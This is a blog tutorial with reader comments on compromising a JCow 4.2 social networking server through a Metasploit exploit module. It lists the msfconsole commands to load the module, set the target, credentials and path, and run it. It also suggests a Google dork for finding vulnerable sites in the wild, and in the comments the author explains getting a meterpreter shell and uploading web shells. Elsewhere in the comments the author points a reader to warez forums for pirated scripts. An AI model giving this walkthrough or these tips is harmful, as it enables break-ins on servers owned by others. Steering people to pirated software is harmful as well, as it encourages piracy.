4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution

4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution


Type : Tutorial

Level : Medium

Victim Server : Windows XP SP3

Victim vulnerable application : JCow 4.2

Attacker O.S : Backtrack 5 R1

After very long times I didn't write about hacking webserver, today "again" when surfing around I've found that Jcow Social netwoking engine can be exploited and the exploit ranking marked as "excellent".

So actually what happen when you have this Jcow vulnerable version??The simple thing is the attacker can go through your web server directory and doing everything there. For example if you hosting your Jcow vulnerable version(on unsecure hosting also πŸ™‚ ) you can own your web server directory.

In this example, let's say I have a Jcow vulnerable web server in IP address Actually it's better to try installing your own web server, but if you want to find out Jcow in the wild you can search through Google dork "intext:Powered by Jcow 4.2.0" and register as normal user there. In this tutorial I have already register as username : victim and password also victim πŸ™‚

Okay I hope you understand what I say above πŸ˜› to make it more realistic, let's try the tutorial…

Requirement :

1. Metasploit framework

2. Jcow.rb exploit


4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution :

1. Copy the downloaded jcow.rb exploit from the download link above and copy it into /pentest/exploits/framework/modules/exploits/remote/ folder(see the command below).

cp jcow.rb /pentest/exploits/framework/modules/exploits/remote/

the text "framework" with blue color it's because I'm using Backtrack 5 R1 and using metasploit v4.0.1, so the name was depends on your Metasploit version, maybe on your computer it can be "framework3" or "framework2" so on..

If you didn't know how to copy that jcow.rb file into your Backtrack, please refer to this tutorial about Linux folder sharing(click here).

2. Open your Metasploit console and then use the exploit you just added before.

msf > use exploit/remote/jcow

3. The next step we need to view the available switch for this exploit by running show options command, and then configured it(see the box with red color).

4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution

msf  exploit(jcow) > set rhost --> set the target IP
rhost =>
msf  exploit(jcow) > set username victim --> set the username
username => victim
msf  exploit(jcow) > set password victim --> set the password
password => victim
msf  exploit(jcow) > set uri jcow --> only if jcow not in / directory fill it here
uri => jcow

Information :

Set uri can be used if jcow was not installed on webserver main directory, for example http://web-server.com/jcow.

4. After everything was set up successfully, the next thing to do was exploiting or running the exploit by using exploit command.

4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution


Countermeasures :

1. Update your Jcow Social Networking into > v4.2

Hope you enjoyed…any question?just drop it below.. πŸ™‚

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

(Visited 157 times, 1 visits today)

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web.
Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • Nice tutorial!
    Thanks for featuring our exploit.

    • v4L

      You’re welcome, btw thanks also for your exploit…next time when I write the tutorial, i’LL write a credit for the exploit maker πŸ™‚

  • Varius

    Cool. But how to upload some shell to the server? Didn't understand. Can help me, please?

    • v4L

      Actually when you’re inside a meterpreter you just need to run shell command to turn into shell. And about how to upload some shell, maybe what you mean was about meterpreter file system command.

  • Varius

    Thanks for you reply! I''l read that tutorial mindfully. I'm not a hacker, just using this script on my site, One more question: this line 'Uploading the payload: /files/asgRk2.php' so, if I want to upload some shell into my site, using this exploit, for example, gnyshell.php, what command in metasploit should I use? Thanks in advance

    • v4L

      You can use meterpreter upload command..

  • Pingback: Hacking Jcow Social Networking Webserver()

  • Varius

    Thank u!

  • Varius

    Good day! May I ask you one more question? What payload in metasploit should I use to start meterpreter? What steps do I miss? Because exploit connects to vulnerable script, than this message occurs "Exploit completed, but no session was created."

    • v4L

      There’s many payload you can use…. use search meterpreter command or you also can use show payloads command.

  • Varius

    Thanks a lot! A very usefull info I found in this site! Y've helped me very much

    • v4L

      You’re welcome

    If someone is interested here can learn about facebook hacking, potecting 
    facebook account, facebook security, hacking tutorials for begginers and something about facebook games. 
    if you are not interested in this skip the comment and sorry for disturbing. 

  • Pingback: Hacking Jcow Social Networking Webserver « Belajar Bersama Ovhan()

  • jjordan

    Dear Sir, I want your 1 help…please help me…I really in a problem…I want jcow professonal v7 plus [Full Version] free downloadable link….plz give me the link…Its my dream to start a social networking site..I am come from very poor family…plz help me plz….waiting for ur help….

    • v4L

      You can search in a warez forum. They have much more resources for nulled scripts, web template and web engine…

  • Hi there I am so grateful I found your web site, I really found
    you by accident, while I was researching on Bing for something else, Regardless I am here now and
    would just like to say thanks a lot for a marvelous post and a all round thrilling blog (I also love the theme/design), I don’t have time to go through it all at the minute but I
    have bookmarked it and also added in your RSS feeds, so when
    I have time I will be back to read a lot more, Please
    do keep up the great work.

  • I seriously love your blog.. Excellent colors & theme.

    Did you make this website yourself? Please reply back as I’m trying to create my own personal blog and want to know where you got this from or exactly what the theme is named. Cheers!

  • Hello! Would you mind if I share your blog with my zynga group?
    There’s a lot of people that I think would really enjoy your content. Please let me know. Thanks

    • v4L

      Sure, as long as you put the link credit to this website without remove the copyright.

  • Richard

    I’ve read so many blogs and
    articles that these hacker’s can ruin someone’s life. Damn! I never believe on
    that. Who do you think you are a genius??? They said that you can actually
    access anyone’s bank account and rip them off through email hacking and even
    can lose a job because of hackers! Are you all crazy??? I have a stable job and
    nobody can make me lose my job! I have a good position and every company needs me! I have a strong security on any bank account. So I dare all the so called genius hackers there!

    1st – make me lose my job and make
    me jobless forever

    2nd – access my bank account and
    rip me off

    3rd – ruin my life and my reputation

    I will wait, I will not give you too much info about myself just my email adds. Let’s see how good all of you!



    waiting for you all losers!